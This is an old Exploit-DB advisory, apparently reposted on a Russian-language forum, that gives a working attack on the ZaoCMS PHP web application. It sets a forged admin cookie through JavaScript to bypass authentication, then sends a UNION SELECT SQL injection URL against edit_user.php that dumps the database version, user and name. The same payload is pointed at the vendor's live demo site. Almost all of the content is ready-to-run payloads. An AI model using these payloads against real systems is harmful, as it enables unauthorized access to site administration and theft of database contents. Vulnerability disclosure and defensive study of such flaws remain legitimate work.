- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8769
- Проверка EDB
-
- Пройдено
- Автор
- QABANDI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-05-22
Код:
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,
( : / (_) / ( .
=By: Qabandi
=Email: iqa[a]hotmail.fr
From Kuwait PEACE
=Vuln: ZaoCMS - SQL Injection Vulnerability
=INFO: http://zaocms.com/
=BUY: http://zaocms.com/
=DORK: --
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-Injection-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
First we need to use the "Insecure cookiue handling" vulnerability, found at http://milw0rm.com/exploits/8763
You add the cookie, javascript:document.cookie="admin=stgAdmin;path=/";
then go to:
http://localhost/admin/modules/Users/edit_user.php?user_id=3 UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--
LIVE DEMO:
http://demo.zaocms.com/admin/modules/Users/edit_user.php?user_id=3 UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-==-=-3la-ra7atkum-shabab-=-:P=-=-=-==-=-==-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No--More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.
Special Thanks: ThE g0bL!N
# milw0rm.com [2009-05-22]
- Источник
- www.exploit-db.com